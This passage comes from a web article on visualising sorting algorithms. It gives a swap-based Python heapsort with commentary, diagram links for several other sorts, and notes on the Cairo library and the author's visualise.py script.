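<p>The steps above can be phrased entirely in terms of swaps, which is exactly what lets heapsort fit this visualisation. A rough sketch (not the code behind these images) that records each swap as one time step:</p>

```python
def heapsort(arr):
    """In-place heapsort expressed purely as swaps, so each swap is one
    time step (one column) in the diagrams above."""
    swaps = []
    def swap(i, j):
        arr[i], arr[j] = arr[j], arr[i]
        swaps.append((i, j))
    def sift_down(root, end):
        # Step 3: restore the heap property in arr[root..end].
        while 2 * root + 1 <= end:
            child = 2 * root + 1
            if child < end and arr[child] < arr[child + 1]:
                child += 1          # pick the larger child
            if arr[root] >= arr[child]:
                break
            swap(root, child)
            root = child
    n = len(arr)
    # Step 1: build a max-heap bottom-up; the largest element ends up at index 0.
    for root in range(n // 2 - 1, -1, -1):
        sift_down(root, n - 1)
    # Steps 2-4: move the maximum below the heap, then re-establish the heap.
    for end in range(n - 1, 0, -1):
        swap(0, end)
        sift_down(0, end - 1)
    return swaps
```

<p>The swaps from the first loop form the "establish the heap" region on the left of the image; each iteration of the second loop produces one of the repeating stripes that follow.</p>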
<p>Looking at the visualisation, we can see Step 1 clearly - it is the
portion of the diagram before the point where the largest element in the
array is slotted into place. After that, we can see a repeated pattern -
the heap is re-established and the greatest element is moved to below the
heap again and again until the array is sorted.</p>
<p>We can immediately make some quite sophisticated observations. For example, we
can see that although initially establishing the heap is costly,
re-establishing it after the greatest element is removed requires an
approximately constant amount of time throughout the sorting process - meaning
that the time required is relatively independent of the number of items still
in the heap. This is an interesting property that is not immediately obvious
from an analysis of the algorithm itself.</p>
<p>Right - enough prattling! Here is a selection of other visualised algorithms
for your viewing pleasure:</p>
<h2 id="quicksort">Quicksort</h2>
<div class="media">
<a href="quick.png">
<img src="quick.png" />
</a>
<div class="subtitle">
Quicksort
</div>
</div>
<h2 id="selection-sort">Selection Sort</h2>
<div class="media">
<a href="selection.png">
<img src="selection.png" />
</a>
<div class="subtitle">
Selection sort
</div>
</div>
<h2 id="insertion-sort">Insertion Sort</h2>
<div class="media">
<a href="listinsertion.png">
<img src="listinsertion.png" />
</a>
<div class="subtitle">
Insertion sort
</div>
</div>
<h2 id="shell-sort">Shell Sort</h2>
<div class="media">
<a href="shell.png">
<img src="shell.png" />
</a>
<div class="subtitle">
Shell sort
</div>
</div>
<h2 id="the-code">The Code</h2>
<p><a href="visualise.py">visualise.py</a></p>
<p>This whole thing started partly as an excuse to get familiar with the <a
href="http://cairographics.org">Cairo</a> graphics library. It produces
beautiful, clean images, and appears to be both portable and well designed. It
also comes with a set of Python bindings that are maintained as part of the
project itself - a big plus in my books. Firefox 3 will use Cairo as its
standard rendering back end, which will instantly make it one of the most widely
used vector graphics libraries out there.</p>
<p>The examples on this page were generated using a command somewhat like the
following:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">./visualise.py -l</span><span style="color:#c0c5ce;"> 6</span><span style="color:#bf616a;"> -x</span><span style="color:#c0c5ce;"> 700</span><span style="color:#bf616a;"> -y</span><span style="color:#c0c5ce;"> 300</span><span style="color:#bf616a;"> -n</span><span style="color:#c0c5ce;"> 15
</span></code></pre>
<p><strong>Update 9/8/09</strong>: A newer version of the code is now available on <a
href="http://github.com/cortesi/sortvis/tree/master">github</a>. You can check
it out like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">git</span><span style="color:#c0c5ce;"> clone git://github.com/cortesi/sortvis.git
</span></code></pre>